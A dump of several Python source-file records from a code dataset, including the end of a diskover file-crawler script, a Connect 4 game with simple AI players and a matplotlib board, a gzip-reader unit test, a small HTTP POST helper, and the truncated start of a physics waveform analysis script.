sys.exit(1)\n else:\n # get absolute path\n path = os.path.abspath(CLIARGS['rootdir'])\n # remove any trailing slash unless root /\n if path is not '/':\n path = path.rstrip(os.path.sep)\n # check if file exists if only indexing single file\n elif CLIARGS['file']:\n # check if file exists\n if not os.path.exists(CLIARGS['file']):\n LOGGER.error(\"File not found, exiting\")\n sys.exit(1)\n\n LOGGER.debug('Excluded files: %s', CONFIG['excluded_files'])\n LOGGER.debug('Excluded dirs: %s', CONFIG['excluded_dirs'])\n\n # check if we are just indexing single file -f option\n if CLIARGS['file']:\n try:\n path = os.path.abspath(os.path.join(CLIARGS['file'], os.pardir))\n name = os.path.basename(CLIARGS['file'])\n # create instance using scandir class\n entry = GenericDirEntry(path, name)\n # index file in Elasticsearch\n get_file_meta(0, entry, [], singlefile=True)\n sys.exit(0)\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, exiting')\n sys.exit(0)\n\n # Set up Queue and lock for worker threads\n if CLIARGS['breadthfirst']:\n q = Queue.PriorityQueue(maxsize=1000)\n else:\n q = Queue.Queue(maxsize=1000)\n lock = threading.RLock()\n\n # tag duplicate files if cli argument\n if CLIARGS['finddupes']:\n # Set up worker threads for duplicate file checker queue\n worker_setup_dupes()\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n LOGGER.info('Finished checking for dupes')\n print_stats(stats_type='updating_dupe')\n # exit we're all done!\n sys.exit(0)\n\n # start crawlbot if cli argument\n if CLIARGS['crawlbot']:\n dirlist = index_get_docs('directory')\n start_crawl_bot(dirlist)\n sys.exit(0)\n\n # calculate dir sizes if cli argument\n if CLIARGS['dirsize']:\n if CLIARGS['dirsize'] is \"all\":\n # look in ES for all directory docs and add to queue\n dirlist = index_get_docs('directory')\n else:\n # use directory from cli arg\n fp = os.path.abspath(CLIARGS['dirsize']).rstrip(os.path.sep)\n dirlist = index_get_docs('directory', fp)\n # Set up worker threads for calculating dir sizes\n worker_setup_dirsizes(dirlist)\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished updating directory sizes')\n sys.exit(0)\n\n # copy tags from index2 to index if cli argument\n if CLIARGS['copytags']:\n # look in ES for all directory docs and add to queue\n dirlist = index_get_docs('directory')\n # look in ES for all file docs and add to queue\n filelist = index_get_docs('file')\n # Set up worker threads for collecting tags\n worker_setup_copytags(dirlist, filelist)\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished copying tags')\n sys.exit(0)\n\n # create Elasticsearch index\n index_create()\n\n # check if we are reindexing and remove existing docs in Elasticsearch\n if CLIARGS['reindex']:\n index_delete_path(path)\n elif CLIARGS['reindexrecurs']:\n index_delete_path(path, recursive=True)\n\n # Set up worker threads and start crawling from top rootdir path\n worker_setup_crawl(path)\n\n # Calculate directory sizes and print stats\n if not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n LOGGER.info('Finished crawling')\n print_stats(stats_type='crawl')\n # exit, we're all done!\n sys.exit(0)\n","sub_path":"diskover.py","file_name":"diskover.py","file_ext":"py","file_size_in_byte":104773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"401971548","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 27 11:54:07 2018\r\n\r\nThis is my Connect 4 game.\r\n\r\nWhat it *should* do:\r\n ~ The player has a choice of playing against another human, which is convenient for testing edge\r\n cases.\r\n ~ The player can choose between a dumb AI that picks a column at random, or;\r\n ~ The player can choose a 'smart' AI that is a little more descerning in it's choices. For\r\n details, see the relevant classes.\r\n ~ The player can choose a board size from 1 x 1 to 15 x 15.\r\n ~ The player can pick their name.\r\n ~ The player can choose whether to go first or second.\r\nWhat it will NOT do:\r\n ~ This is Connect 4, not Connect 5, Connect 3 or Connect 1,000,000\r\n ~ The player cannot name the AI.\r\n ~ The player cannot change any colors on the board, or add additional players.\r\n \r\nThe program *should* run fine in Spyder3. But for a better experience, run in the command line. The\r\ndisplay tends to freeze for a few seconds at the start if run on Spyder. I set my line widths to 100\r\nso if you're having any wrapping issues, that could be why.\r\n\r\n\"\"\"\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# ==================================================================================================\r\n# IMPORT STATEMENTS\r\n# ==================================================================================================\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nfrom matplotlib import style\r\nstyle.use('classic') # The best kind of style.\r\n\r\n\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# ==================================================================================================\r\n# MAIN GAME\r\n# ==================================================================================================\r\n# \r\n# The main game consists of 5 classes:\r\n# 1. Board\r\n# 2. HumanPlayer\r\n# 3. StupidMachinePlayer\r\n# 4. NonStupidMachinePlayer\r\n# 5. Game\r\n# Originally intended to be stand alone, and it is to a certain extent, but in order to use some of\r\n# the fancy graph functions, I had to embed function calls within this class. So if this class is to\r\n# be fully stand alone, those function calls need to be commented out. I have highlighted these\r\n# calls with # ***.\r\n# ==================================================================================================\r\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nclass Board:\r\n \"\"\"Defines the board class. \r\n Attr: board\r\n \"\"\" \r\n def __init__(self, columns, rows):\r\n \"\"\"Initializer for the Board class\"\"\"\r\n self.rows = rows\r\n self.columns = columns\r\n self.board = np.zeros((rows, columns))\r\n \r\n def __str__(self):\r\n \"\"\"string representation of the board.\"\"\"\r\n string = \"\"\r\n for row in self.board:\r\n string += str(row) + '\\n'\r\n return string\r\n \r\n def change_board(self, column, symbol):\r\n \"\"\"Updates the board to reflect the most recent move.\"\"\"\r\n if symbol == 'B':\r\n modifier = 1\r\n else:\r\n modifier = -1\r\n column_array = self.board[:,column]\r\n flipped_column = np.flip(column_array, 0)\r\n i = 0\r\n while i < self.rows:\r\n if flipped_column[i] == 0.0:\r\n self.board[self.rows-1-i][column] = modifier\r\n break\r\n else:\r\n i += 1\r\n \r\n def create_sub_arrays(self, size):\r\n \"\"\"Called by the is_win() method to break up the main board into 4x4\r\n sub-arrays.\"\"\"\r\n row_start = 0\r\n sub_boards = [] \r\n while row_start < ROWS-(size-1):\r\n col_start = 0\r\n while col_start < COLS-(size-1):\r\n sub_board = self.board[row_start:row_start+size, col_start:col_start+size]\r\n sub_boards.append(sub_board)\r\n col_start += 1\r\n row_start += 1\r\n return sub_boards\r\n \r\n def is_win(self, number):\r\n \"\"\"Searches the boards for wins.\"\"\"\r\n sub_boards = self.create_sub_arrays(number)\r\n win = False\r\n # diagonals\r\n for sub_board in sub_boards:\r\n if np.trace(sub_board) == number or np.trace(sub_board) == -number:\r\n return True\r\n flipped = np.fliplr(sub_board)\r\n if np.trace(flipped) == number or np.trace(flipped) == -number:\r\n return True\r\n # rows\r\n for row in sub_board:\r\n if sum(row) == number or sum(row) == -number:\r\n return True\r\n # columns\r\n for row in sub_board.transpose():\r\n if sum(row) == number or sum(row) == -number:\r\n return True\r\n return win\r\n\r\n def is_full(self, column):\r\n \"\"\"Checks to see if a column is full. Returns True if full, False, otherwise.\"\"\"\r\n result = False\r\n if 0. not in self.board.transpose()[column]:\r\n result = True\r\n return result\r\n \r\n \r\nclass HumanPlayer:\r\n \"\"\"Defines the player class. \r\n Attr: symbol\r\n name\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the Player class.\"\"\"\r\n self.name = name\r\n self.symbol = symbol\r\n \r\n def get_move(self, board):\r\n \"\"\"Takes raw input from the player and returns the column number.\r\n will only allow integers between 0 and 6.\"\"\"\r\n result = None\r\n while result is None:\r\n prompt = \"please enter a column number: \"\r\n try:\r\n column = int(input(self.name + ', ' + prompt))\r\n if (1 <= column <= COLS) and board.is_full(column-1) is False:\r\n return column - 1\r\n else:\r\n raise ValueError\r\n except ValueError: \r\n print(\"\\n\" + (\"=\" * 69))\r\n print(\"INVALID COLUMN NUMBER!\")\r\n print(\"=\" * 69)\r\n\r\n\r\nclass StupidMachinePlayer:\r\n \"\"\"Defines the StupidMachinePlayer class. This AI will just go anywhere at random.\r\n Attr: symbol\r\n Name: Forrest\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the StupidMachinePlayerClass.\"\"\"\r\n self.symbol = symbol\r\n self.name = name\r\n \r\n def get_move(self, board):\r\n \"\"\"Get a random column.\"\"\"\r\n column = random.randint(0,board.columns - 1)\r\n while board.is_full(column): # We need to check and make sure that the column isn't full.\r\n column = random.randint(0, board.columns - 1)\r\n return column\r\n\r\n\r\n# =============================================================================\r\n# THE MAIN AI\r\n# This is one class that consists of a main function, get_move(), and helper functions to return the\r\n# results of searching the sub-arrays for matching lines. From looking at the helper fuctions,\r\n# I attempted to abstract a function from both, but I gave up after not being able to figure out\r\n# the errors. Similarly the rowfinder function is horrendous. This is because of the large number\r\n# cases that need to be considered - we need to check whether we're on the left edge, right edge,\r\n# bottom edge, and whether there are empty slots below the potential move location.\r\n# =============================================================================\r\n \r\nclass NonStupidMachinePlayer:\r\n \"\"\"Defines a machine player that doesn't play like Forrest Gump.\r\n Attr: symbol\r\n Name: Albert\r\n \"\"\"\r\n \r\n def __init__(self, name, symbol):\r\n \"\"\"Initializer for the NonStupidMachinePlayer.\"\"\"\r\n self.symbol = symbol\r\n self.name = name\r\n \r\n\r\n def get_move(self, board):\r\n \"\"\"The AI follows a set of instructions. It first checks whether it can make a row of\r\n three, then a column of three. Then it checks to see if the\r\n opponent can make a four anywhere on the next move. If these statements all come back\r\n false, then it goes to 2s. It doesn't check the diagonals. It's not that smart.\"\"\"\r\n move = self.row_finder(board, 3) # Check the threes\r\n if move is None:\r\n move = self.col_finder(board, 3)\r\n if move is None:\r\n move = self.row_finder(board, 3, opfor=True) # Check opponent threes\r\n if move is None:\r\n move = self.col_finder(board, 3, opfor=True)\r\n if move is None:\r\n move = self.row_finder(board, 2) # Check the twos\r\n if move is None:\r\n move = self.col_finder(board, 2)\r\n if move is None:\r\n move = self.row_finder(board, 2, opfor=True) # Check the opponent twos\r\n if move is None:\r\n move = self.col_finder(board, 2, opfor=True)\r\n if board.is_full(move):\r\n self.get_move(board)\r\n if move is None:\r\n move = random.randint(0,board.columns - 1)\r\n while board.is_full(move):\r\n move = random.randint(0, board.columns - 1) \r\n return move\r\n \r\n def col_finder(self, board, sub_size, opfor=False):\r\n \"\"\"Takes a board, specification of sub-array size, and whether we are seraching for the\r\n opponent's disks. Returns the position in the main array that the column starts at.\r\n \"\"\"\r\n sub_boards = board.create_sub_arrays(sub_size) # split main array into sub-arrays\r\n if opfor is True:\r\n target = (-1) * sub_size # look for opponents disk\r\n else:\r\n target = sub_size\r\n result = None\r\n moves = set() # moves are in a set to get rid of\r\n col_count = 0 # keep track of sub-arrays\r\n for sub in sub_boards:\r\n row_count = 0\r\n trans = sub.transpose() # transpose array\r\n for row in trans:\r\n if sum(row) == target:\r\n c = col_count\r\n r = row_count\r\n row_index = c // (COLS - sub_size + 1) # Converts the number of times\r\n col_index = c % (COLS - sub_size + 1) + r # iterated through the arrays, into\r\n moves.add((row_index, col_index)) # array coords. Kind of like finding\r\n row_count += 1 # the parent of tree node.\r\n col_count += 1\r\n for move in moves:\r\n row, column = move\r\n if board.board[row-1][column] == 0.:\r\n return column\r\n return result\r\n \r\n def row_finder(self, board, sub_size, opfor=False):\r\n \"\"\"Takes a board, sub_size, and whether we are searching for the opponent's disks. Returns\r\n the position in the main array that the column starts at.\"\"\"\r\n sub_boards = board.create_sub_arrays(sub_size) \r\n if opfor is True:\r\n target = (-1) * sub_size\r\n else:\r\n target = sub_size\r\n result = None\r\n moves = set()\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n for row in sub:\r\n if sum(row) == target:\r\n c = col_count\r\n r = row_count\r\n row_index = c//(COLS - sub_size + 1) + r # Identify starting indices for 3-line\r\n col_index = c % (COLS - sub_size + 1)\r\n moves.add((row_index, col_index))\r\n row_count += 1\r\n col_count += 1\r\n # We now need to check if there is a valid move either side of each 3-line\r\n for move in moves:\r\n row, column = move\r\n right = column + sub_size # The position to the right of the line\r\n left = column - 1 # The position to the left of the line\r\n if row == ROWS - 1: # If we're on the bottom\r\n if left <= 0: # Far left\r\n if board.board[row][right] == 0.:\r\n return right\r\n elif right == COLS: # Far right\r\n if board.board[row][left] == 0.:\r\n return left\r\n else: # In the middle of the board\r\n if board.board[row][left] == 0.:\r\n return left\r\n elif board.board[row][right] == 0.:\r\n return right\r\n else:\r\n if right == COLS:\r\n if board.board[row][left] == 0. and board.board[row+1][left] != 0.:\r\n return left\r\n elif left < 0:\r\n if board.board[row][right] == 0. and board.board[row+1][right] != 0.:\r\n return right\r\n else:\r\n if board.board[row][left] == 0. and board.board[row+1][left] != 0.:\r\n return left\r\n elif board.board[row][right] == 0. and board.board[row+1][right] != 0.:\r\n return right \r\n return result\r\n \r\n \r\n \r\nclass Game:\r\n \"\"\"Defines the Game class.\r\n Attr: player1\r\n player2\r\n current_player\r\n board\r\n \"\"\"\r\n \r\n def __init__(self, player1, player2, board):\r\n \"\"\"\"Initializer for the Game class.\"\"\"\r\n self.board = board\r\n self.player1 = player1\r\n self.player2 = player2\r\n self.current_player = player1\r\n \r\n def update_display_file(self): # ***\r\n \"\"\"Updates the save file with the current moves. It is called every time a move is made.\r\n Annoyingly, this wouldn't work outside of the Game class.\"\"\"\r\n update = open('new.txt', 'w')\r\n row = 0\r\n while row < ROWS:\r\n col = 0\r\n while col < COLS:\r\n item = self.board.board[(ROWS-1)-row][col]\r\n if item == -1:\r\n item = 'red'\r\n elif item == 1:\r\n item = 'yellow'\r\n else:\r\n item = 'w'\r\n update.write(\"{},{},{}\\n\".format(col + 1, row + 1, item))\r\n col += 1\r\n row += 1\r\n update.close()\r\n \r\n def play(self):\r\n \"\"\"\"Main method responisble for the game.\"\"\"\r\n while not self.game_over():\r\n #print(self.board)\r\n self.update_display_file() # ***\r\n update() # ***\r\n column = self.current_player.get_move(self.board)\r\n self.board.change_board(column, self.current_player.symbol)\r\n self.next_player()\r\n #print('\\n' + '='*29) # Board can be printed to the console\r\n #print(self.board)\r\n print('='*29)\r\n self.update_display_file() # ***\r\n update() # ***\r\n if self.is_won():\r\n self.winner().name\r\n if self.is_draw():\r\n print(\"Nobody wins! How exciting... you must both be evenly matched.\")\r\n else:\r\n print(\"{} wins! Good job buddy!\".format(self.current_player.name))\r\n plt.show() # Keeps the display from just randomly closing after the line is drawn.\r\n \r\n def game_over(self):\r\n \"\"\"Decides the current state of the game. Returns True if the game is\r\n either won or drawn, else returns False.\"\"\"\r\n return self.is_won() or self.is_draw()\r\n \r\n def is_won(self):\r\n \"\"\"Determines whether game is won. Returns a boolean.\"\"\"\r\n return self.board.is_win(4)\r\n \r\n def is_draw(self):\r\n \"\"\"Determines whether the game is a draw. Returns a boolean.\"\"\"\r\n full = True\r\n for column in range(COLS):\r\n if not self.board.is_full(column):\r\n full = False\r\n break\r\n return not self.is_won() and full\r\n \r\n def next_player(self):\r\n \"\"\"Changes the current player to the next player.\"\"\"\r\n if self.current_player == self.player1:\r\n self.current_player = self.player2\r\n else:\r\n self.current_player = self.player1\r\n \r\n def winner(self):\r\n \"\"\"Gets the winner.\"\"\"\r\n self.next_player()\r\n return self.current_player\r\n \r\n \r\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \r\n# =================================================================================================\r\n# INITIALIZER AND EXTRAS\r\n# The display section of code is a bit of a mess, because I couldn't get the\r\n# animation module of matplot to work inside of a function.\r\n# =================================================================================================\r\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n# =============================================================================\r\n# USER PARAMETERS\r\n# This section grabs all the info from the user about board size.\r\n# =============================================================================\r\n\r\ndef get_user_parameters():\r\n \"\"\"Asks the user for parameters:\r\n - Human vs Human, or Human vs Machine\r\n - Stupid Machine or Smart Machine (difficulty level)\r\n - Player 1 name\r\n - Player 2 name\r\n - Board size\r\n - Tokens to win\r\n \"\"\"\r\n # 1.\r\n first = False\r\n human_or_machine = str.upper(raw_input(\"Are you playing with a friend (Y/N)? \"))\r\n # AI or not\r\n while human_or_machine != 'Y' and human_or_machine != 'N':\r\n print(\"\\nIt seems you cannot follow simple instructions. Enter either a 'Y' or a 'N'.\")\r\n human_or_machine = str.upper(raw_input(\"Are you playing with a friend (Y/N)? \"))\r\n # Human \r\n if human_or_machine == 'Y':\r\n response = (\"\\nI'm not quite sure how you managed to convince another living person to play \"\r\n \"this game with you. You must both be equally lonely...\\n\")\r\n player1 = raw_input(response + \"\\nPlease enter the name of player 1. \")\r\n player2 = raw_input(\"\\nPlease enter the name of player 2. \")\r\n # AI \r\n elif human_or_machine == 'N':\r\n response = (\"\\nSo sad that you have no friends to play with. Although, you are playing a \"\r\n \"very low-budget version of Connect Four, so I shouldn't be surprised...\\n\")\r\n print(response)\r\n # Move first or second\r\n first_second = (raw_input(\"Do you want to move 1st or 2nd (1/2)? \"))\r\n while first_second != '1' and first_second != '2':\r\n print(\"\\nIt seems you cannot follow simple instructions. Enter either a '1' or a '2'.\") \r\n first_second = str.upper(raw_input(\"Do you want to move 1st or 2nd (1/2)? \"))\r\n if first_second == '1':\r\n first = True \r\n # Player name\r\n player1 = input(\"Please enter your name. \")\r\n difficulty_selection = (\"\\nOK, so there are basically two difficulty settings for this game: \"\r\n \" 0 and 1. Setting 0 puts you against a machine player that will \"\r\n \"pick a position entirely at random. Seriously, if you lose at this \"\r\n \"difficulty, you should rethink your life. Setting 1 puts you \"\r\n \"against a player that basically doesn't play like Forrest Gump. \"\r\n \"Although, he WAS surprisingly good at ping-pong. It is unlikely \"\r\n \"that you will win. Anyway, which \"\r\n \"setting would you like to go with (0/1)? \")\r\n print(difficulty_selection)\r\n result = False\r\n while result is False:\r\n try:\r\n player2 = int(raw_input())\r\n if not (player2 == 0 or player2 == 1):\r\n raise ValueError\r\n result = True\r\n except ValueError:\r\n print(\"\\nEnter '0' for easy and '1' for hard, not 'whatever you feel like.' \")\r\n # Board size \r\n cols = raw_input(\"\\nOK, just one last thing. I need to know the size of the board that you want to \"\r\n \"play on. The stanadard board size is 7 columns by 6 rows, but you can really \"\r\n \"enter as many as you want up to 15. So, how many colummns do you want? \") \r\n while not cols.isnumeric():\r\n cols = raw_input(\"\\nYeah, so whatever that was, it sure as hell wasn't a valid number. \"\r\n \"Please enter the number of columns that you want in INTEGER FORM. \")\r\n while not 0 < int(cols) < 16:\r\n cols = raw_input(\"\\nCome on stop messing around. Pick a number between 1 and 15. \")\r\n \r\n rows = raw_input(\"\\nAnd how many rows do you want? \")\r\n while not rows.isnumeric():\r\n rows = input(\"\\nYeah, so whatever that was, it sure as hell wasn't a valid number. \"\r\n \"Please enter the number of rows that you want in INTEGER FORM. \")\r\n while not 0 < int(rows) < 16:\r\n rows = raw_input(\"\\nYou need to pick a number between 1 and 15. \")\r\n \r\n print(\"\")\r\n \r\n return player1, player2, int(cols), int(rows), first\r\n \r\n \r\ndef user_params():\r\n \"\"\"Instantiates the players, board, and sets up the game.\"\"\"\r\n p1, p2, cols, rows, first = get_user_parameters()\r\n if type(p2) is int:\r\n if p2 == 0:\r\n player2 = StupidMachinePlayer('Forrest', 'B')\r\n else:\r\n player2 = NonStupidMachinePlayer('Albert', 'B')\r\n else:\r\n player2 = HumanPlayer(p2, 'B')\r\n player1 = HumanPlayer(p1, 'R') \r\n board = Board(cols, rows)\r\n if first is False:\r\n player1, player2 = player2, player1\r\n game = Game(player1, player2, board) \r\n return cols, rows, game\r\n\r\nglobal COLS, ROWS, GAME # This is horrible practice, I know, but I couldn't really find\r\nCOLS, ROWS, GAME = user_params() # another way to do this. Placement also had to be specific to\r\n # avoid reference errors. \r\n\r\n\r\n# =============================================================================\r\n# PLOTTING THE GAME BOARD\r\n# Calls the FuncAnimation method from matplotlibs animation library. To be perfectly honest, I'm \r\n# still not 100% sure how it works, but it does, so that's nice. Interestingly, this code also works\r\n# with collecting data in real time from some other source, and updating a display.\r\n# =============================================================================\r\n\r\nfig = plt.figure(figsize=(COLS+1,ROWS)) # Sets up the graph. The figure size will expand with\r\nax1 = fig.add_subplot(1,1,1) # the number of rows and columns.\r\n\r\ndef animate(i): \r\n \"\"\"Main function that creates the graph. Essentially, it takes all of the data from a saved\r\n file and plots them to a scatter plot. Each point has one attribute: color.\"\"\"\r\n graph_data = open('new.txt', 'r').read()\r\n lines = graph_data.split('\\n')\r\n xs = []\r\n ys = []\r\n zs = []\r\n for line in lines:\r\n if len(line)>1:\r\n x, y, z = line.split(',')\r\n xs.append(float(x) + 0.5)\r\n ys.append(float(y) + 0.5)\r\n zs.append(z)\r\n ax1.clear()\r\n plt.xlim(1, COLS+1)\r\n plt.ylim(1, ROWS+1)\r\n ax1.set_facecolor('blue')\r\n ax1.scatter(xs, ys, s=2500, c=zs, linestyle='None')\r\n if GAME.is_won(): # Plot the winning line.\r\n a, b = update_final_win() # Head over to the section responsible for\r\n plt.plot(a, b, linestyle='-', color='k', lw=5)\r\n winner = GAME.current_player.name\r\n plt.title(s=\"{}, wins!\".format(winner))# Plot winner.\r\n \r\ndef update():\r\n \"\"\"Function responsible for updating the graph in real time.\"\"\"\r\n ani = animation.FuncAnimation(fig, animate, interval=1000) # This should display the yellow\r\n fig.canvas.draw() # warning symbol. Not sure why...but\r\n plt.pause(0.01) # it still seems to work.\r\n \r\n \r\n# =============================================================================\r\n# GETTING INFO AFTER A WIN\r\n# Grabs all the info about the win. The main function is update_final_win() with the remaining three\r\n# being the helper functions.\r\n#\r\n# The functions repsonsible for getting the rows, columns\r\n# and traces were all slightly different that made them difficult to abstract into one function.\r\n# =============================================================================\r\n \r\n\r\ndef update_final_win():\r\n \"\"\"Grabs the coordinates from the arrays, and converts them into actual coordinates to be\r\n plotted on the graph.\"\"\"\r\n rows = get_win_row() # Call to the helper functions\r\n cols = get_win_col()\r\n trace = get_win_trace()\r\n if rows is not None:\r\n row, column = rows\r\n x_i = column + 1.5\r\n x_f = x_i + 3\r\n y_i = (ROWS - row) + 0.5\r\n a = [x_i, x_f] # Start point\r\n b = [y_i, y_i] # End point\r\n return a, b\r\n elif cols is not None:\r\n row, column = cols\r\n y_i = (ROWS - row) + 0.5\r\n y_f = y_i - 3\r\n x_i = column + 1.5\r\n a = [x_i, x_i]\r\n b = [y_i, y_f]\r\n return a, b\r\n else:\r\n row, column, flipped = trace # We have to know whether we looking at a normal trace, or\r\n if flipped is False: # the trace of the flipped matrix\r\n x_i = column + 1.5\r\n x_f = x_i + 3\r\n y_i = (ROWS - row) + 0.5\r\n y_f = y_i - 3\r\n else:\r\n x_f = column + 1.5\r\n x_i = x_f - 3\r\n y_f = (ROWS - row) + 0.5\r\n y_i = y_f - 3\r\n a = [x_i, x_f]\r\n b = [y_i, y_f]\r\n return a, b\r\n \r\ndef get_win_row():\r\n \"\"\"Cuts the array into sub-arrays in order to search row by row, returns the coordinates as they\r\n are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size) \r\n target1 = 4 # Looking for both red disks and yellow disks.\r\n target2 = -4\r\n win = None\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n for row in sub:\r\n if sum(row) == target1 or sum(row) == target2:\r\n c = col_count\r\n r = row_count\r\n row_index = c//(COLS - sub_size + 1) + r \r\n col_index = c % (COLS - sub_size + 1)\r\n win = (row_index, col_index)\r\n row_count += 1\r\n col_count += 1\r\n return win\r\n\r\ndef get_win_col():\r\n \"\"\"Cuts the array into sub-arrays in order to search column by column, returns the coordinates \r\n as they are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size)\r\n target1 = 4\r\n target2 = -4\r\n win = None\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n trans = sub.transpose()\r\n for row in trans:\r\n if sum(row) == target1 or sum(row) == target2:\r\n c = col_count\r\n r = row_count\r\n row_index = c // (COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1) + r\r\n win = row_index, col_index\r\n row_count += 1\r\n col_count += 1\r\n return win\r\n\r\ndef get_win_trace():\r\n \"\"\"Cuts the array into sub-arrays in order to search the trace of the arrays, and the traces\r\n of the flipped arrays, returns coordinates as they are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size)\r\n target1 = 4\r\n target2 = -4\r\n sub_count = 0\r\n for sub in sub_boards: \r\n if np.trace(sub) == target1 or np.trace(sub) == target2: \r\n c = sub_count\r\n row_index = c//(COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1)\r\n return row_index, col_index, False\r\n flipped = np.fliplr(sub)\r\n if np.trace(flipped) == target1 or np.trace(flipped) == target2:\r\n c = sub_count\r\n c = sub_count\r\n row_index = c//(COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1) + 3\r\n return row_index, col_index, True\r\n sub_count += 1\r\n \r\n \r\n# =============================================================================\r\n# INITIALIZER\r\n# create_game() is the main function that sets the ball rolling.\r\n# =============================================================================\r\n \r\ndef create_game():\r\n \"\"\"This function is responsible for starting everything up.\"\"\"\r\n save_file = open('new.txt', 'w+') # Create new savefile \r\n for row in range(1, ROWS+1):\r\n for col in range(1, COLS+1):\r\n save_file.write('{},{},w\\n'.format((col), (row))) # Fill the save file with the rows\r\n save_file.close() # and give all data points the\r\n GAME.update_display_file() # the attribute of whiteness.\r\n update() # Also grabs user parameters, and\r\n GAME.play() # creates the 'graph'.\r\n\r\ncreate_game() # Fire it up!\r\n\r\n \r\n# =============================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Connect4.py","file_name":"Connect4.py","file_ext":"py","file_size_in_byte":29744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420035494","text":"from unittest import TestCase\nimport configparser\nfrom stream_reader import gz_reader\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\n\nclass TestGzReader(TestCase):\n def setUp(self) -> None:\n self.gz_reader = gz_reader.GzReader()\n\n def test_read(self):\n \"\"\"\n gunzip takes 1.437s\n this takes only 0.09s\n\n stream reading the gz\n\n :return:\n \"\"\"\n gz_file = config[\"PATHS\"][\"one_pubmed_gz\"]\n MAX_LINES = 10\n for line_num, content in enumerate(self.gz_reader.read(gz_file), start=1):\n if line_num >= MAX_LINES:\n break\n else:\n print(\"{}: {}\".format(line_num, content))\n\n def test_read_stream(self):\n some_bytes = b'\\x1f\\x8b\\x08\\x08\\xd8R\\x0f\\\\\\x00\\x03'\n print(\"\"\"\n raw: {}\n decompressed: {}\n \"\"\".format(\n some_bytes,\n self.gz_reader.read_stream(some_bytes)\n ))\n # self.fail()\n\n def test_read_obs_stream(self):\n one_pubmed_gz_obs = config['PATHS']['one_pubmed_gz_obs_key']\n MAX_LINES = 10\n for line_num, content in enumerate(\n self.gz_reader.read_obs_line(one_pubmed_gz_obs), start=1):\n if line_num > MAX_LINES:\n break\n else:\n print(\"{}: {}\".format(line_num, content))\n\n pubmed_lines = list(self.gz_reader.read_obs_line(one_pubmed_gz_obs))\n print(\"num of pubmeds: [{}]\".format(len(pubmed_lines)))\n\n # self.fail()\n","sub_path":"stream_reader/test_gzReader.py","file_name":"test_gzReader.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"616728671","text":"import urllib2\nimport json\n\nif __name__ == '__main__':\n url = 'http://192.168.0.20:8080/ServiceMgr/hello'\n body = {'flag': 'test','ss': 'nice'}\n body = json.dumps(body)\n http_req = urllib2.Request(url=url,data=body)\n http_req.add_header('Content-type', 'application/json')\n urllib2.urlopen(http_req)\n","sub_path":"SliceO/ext/http/httphelper.py","file_name":"httphelper.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420257879","text":"from __future__ import print_function\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport tables as tb\nimport numpy as np\nimport mplFunctions as mpl\nimport wfmFunctions as wfm\nimport sensorFunctions as snf\nfrom Util import *\nimport FEParam as FP\nfrom scipy import signal as SGN\n\nimport logging\nimport sys\nlogger = logging.getLogger()\nlogger.handlers[0].stream = sys.stdout\nlogger.setLevel(logging.DEBUG)\npes = 1\n\ndef alpha(pmtrwf,pmtdf, geomdf, thr_pmt=10*pes, thr_sipm=4*pes,\n t_trigger = 600, thr_s1 = 30*pes, thr_s2 = 5000*pes,\n log='INFO', plot=False, event_list=[2]):\n \"\"\"\n alpha analysis\n \"\"\"\n lg = 'logging.'+DEBUG\n logger.setLevel(eval(lg))\n\n evl = len(event_list)\n t0 = np.zeros(evl, dtype=np.float32)\n t = np.zeros(evl, dtype=np.float32)\n xb = np.zeros(evl, dtype=np.float32)\n yb = np.zeros(evl, dtype=np.float32)\n s2e = np.zeros(evl, dtype=np.float32)\n s2l = np.zeros(evl, dtype=np.float32)\n ns1 = np.zeros(evl, dtype=np.int32)\n ns2 = np.zeros(evl, dtype=np.int32)\n\n for event in 